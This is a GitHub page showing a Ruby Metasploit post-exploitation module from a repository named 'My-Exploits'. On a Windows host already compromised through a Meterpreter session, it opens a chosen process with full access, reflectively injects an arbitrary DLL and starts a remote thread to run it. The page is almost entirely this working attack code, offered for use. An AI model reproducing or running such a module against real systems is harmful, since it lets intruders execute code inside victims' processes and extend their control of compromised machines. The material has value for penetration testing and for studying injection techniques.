forked from ChaitanyaHaritash/My-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
reflective_dll_injection.rb
48 lines (43 loc) · 1.48 KB
/
reflective_dll_injection.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::Windows::Error
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => "Injects DLL into running process",
'Description' => %q(
Performs DLL injection over current running process on windows.
),
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Chaitanya Haritash']
))
register_options(
[
#OptString.new('SESSION', [true, 'Session ID' ]),
OptString.new('DLL',[true, 'DLL path to be injected']),
OptInt.new('PID',[true, 'Name of process DLL to be injected on'])
], self.class)
end
def run
session = client
se = session.sys.config.sysinfo
dll_path = datastore['DLL']
pid = datastore['PID']
process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
if dll_path.blank?
print_error("DLL path not Defined")
return nil
elsif pid.blank?
print_error("Process Not Define")
else
print_status("Running Module on session #{se['Computer']}")
dll_mem , offset = inject_dll_into_process(process, dll_path)
process.thread.create(dll_mem + offset, 0)
print_success("DLL injected Successfully")
end
end
end